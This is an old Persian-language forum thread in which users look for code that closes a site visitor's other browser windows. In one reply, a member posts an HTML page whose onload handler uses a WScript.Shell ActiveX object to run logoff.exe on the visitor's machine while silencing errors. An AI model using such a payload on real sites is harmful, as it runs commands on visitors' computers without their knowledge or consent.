نيازمند كد براي بستن سايت !

شروع موضوع توسط Pixar ‏11 ژوئن 2004 در انجمن آرشیو

  1. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    با سلام

    يكي از دوستان ما يك سوالي در اين مورد از من كرد من نميدونستم گفتم اينجا مطرح كنم !

    اين دوستمون يك كد ميخواد براي سايتش به طوري كه هنگامي كه مثلا سايت همين دوستمون رو باز ميكنم

    هر page مرورگري كه باز بود حذف بشه و همون صفحه وب سايت مورد نظر فقط باقي بمونه ...

    كدش رو اگه محبت كنيد ممنون ميشم .

    با تشكر .
     
  2. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    لطفا ... :blush:
     
  3. Mashaheer

    Mashaheer مدیر بازنشسته کاربر فعال

    تاریخ عضویت:
    ‏5 می 2003
    نوشته ها:
    1,972
    تشکر شده:
    16
    محل سکونت:
    UAE
    عجب چيزهايي دوستون به دهنش ميرسه سعيد جان
    من كه متاسفانه نميدونم و دوست دارم بدونم كه آيا اينكار چطوري ميشه انجامش داد
     
  4. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    والا طاها جان چه كنيم ديگه ما هم خودمون مونديم ! :D

    ولي دوستم ميگه كدش رو داشته ولي گم كرده براي اين دوباره دنبالش ميگرده !

    با تشكر .
     
  5. Designerman

    Designerman Registered User

    تاریخ عضویت:
    ‏5 مارس 2004
    نوشته ها:
    185
    تشکر شده:
    0
    محل سکونت:
    shahsavar
    من فكر نكنم اين كار شدني باشه
    ولي اگه بشه كه واقعا" جالبه :rolleyes:
     
  6. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    حالا اگه كسي ميدونه لطفا ....!

    با تشكر .
     
  7. M@fia

    [email protected] کاربر تازه وارد

    تاریخ عضویت:
    ‏23 آگوست 2004
    نوشته ها:
    87
    تشکر شده:
    1
    محل سکونت:
    Iran - Mashad
    من يه كد بلدم وقتي بذاري تو وبلاگت هركي واردش بشه بهش پيغام خوش آمد ميگه ! ميخواي طاهري !؟
     
  8. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    بده اونم بد ني !

    مرسي ...
     
  9. M@fia

    [email protected] کاربر تازه وارد

    تاریخ عضویت:
    ‏23 آگوست 2004
    نوشته ها:
    87
    تشکر شده:
    1
    محل سکونت:
    Iran - Mashad
    جدي اگه اين كدا به دردتون ميخوره زياد دارم !
     
  10. fotocopy

    fotocopy مدیر بازنشسته

    تاریخ عضویت:
    ‏9 جولای 2003
    نوشته ها:
    2,850
    تشکر شده:
    35
    محل سکونت:
    سعيد جان اينجا شايد پيداش کني: dynamicdrive.com
     
  11. Gt_Max

    Gt_Max Registered User

    تاریخ عضویت:
    ‏13 آگوست 2003
    نوشته ها:
    1,663
    تشکر شده:
    80
    محل سکونت:
    In Your Pantz
    مرسي نظر ! :D
     
  12. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    مرسي امين جان ...ميگردم ... :)
     
  13. avajang.com .leftjee.ir.right
  14. shankimout

    shankimout Registered User

    تاریخ عضویت:
    ‏17 می 2004
    نوشته ها:
    1,491
    تشکر شده:
    3
    محل سکونت:
    ساری . . . . . . . . . . . . . . Permanently Bann
    من كدي دارم كه كامپيوتر ترف رو لوگ اف كنه

    از تو كد هاي شل استرينگ ويندوز درش اوردم ;) ;)
     
  15. shankimout

    shankimout Registered User

    تاریخ عضویت:
    ‏17 می 2004
    نوشته ها:
    1,491
    تشکر شده:
    3
    محل سکونت:
    ساری . . . . . . . . . . . . . . Permanently Bann
    HTML:
    <html>
    <head>
    <title></title>
    </head>
    <body onload="LaunchCPL_HW()">
    <SCRIPT language="JavaScript">
    
    			var g_bDebugMode = false;
    			if( false == g_bDebugMode )
    			{
    				window.onerror = new Function( "return true" );
    			}
    			var g_sThisHREF = location.href;
    			var g_bValidXMLFile = ValidateXMLFile();
    			var g_oWShell = new ActiveXObject( "WScript.Shell" );
    			function ValidateXMLFile()
    			{
    				var sFile = GetFilePathFromURL( g_sThisHREF );
    				if( !bCorrectPathAndFileName(sFile) ) return false;
    
    				try
    				{
    
    					if( "" == oXML.xml )
    					{
    						return false;
    					}
    					else
    					{
    						return true;
    					}
    				}
    				catch( e )
    				{
    					return false;
    				}
    			}
    
    			function GetFilePathFromURL( sURL )
    			{
    				
    			}
    
    			function bCorrectPathAndFileName( sFilePath )
    			{
    				try
    				{
    
    				}
    				catch( e )
    				{
    					
    				}
    			}
    			function LaunchCPL_HW()
    			{
    				g_oWShell.Run("logoff.exe" );
    				if( false == g_bFromSavedFav )
    				{
    					setTimeout( "pchealth.close();", 500 );
    				}
    			}
    
    			
    </SCRIPT>
    </body>
    </html>
     
  16. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    مرسي عزيز !

    كدش رو تست كردي ؟

    كار ميكنه ؟
     
  17. shankimout

    shankimout Registered User

    تاریخ عضویت:
    ‏17 می 2004
    نوشته ها:
    1,491
    تشکر شده:
    3
    محل سکونت:
    ساری . . . . . . . . . . . . . . Permanently Bann
    اره . اون چيزي كه شما ميخوايي نيست . ولي با جاوا اسكريپت اينكارا هنره... . البته اكتيو ايكس هم اينجا پشم نيست
     
  18. Pixar

    Pixar مدیر بازنشسته

    تاریخ عضویت:
    ‏10 اکتبر 2003
    نوشته ها:
    1,400
    تشکر شده:
    16
    محل سکونت:
    َِChocolate's City
    در كل مرسي ... :blush:
     
zarpopخرید بک لینک عسل طبیعی و گرده گل ایرانیfootbal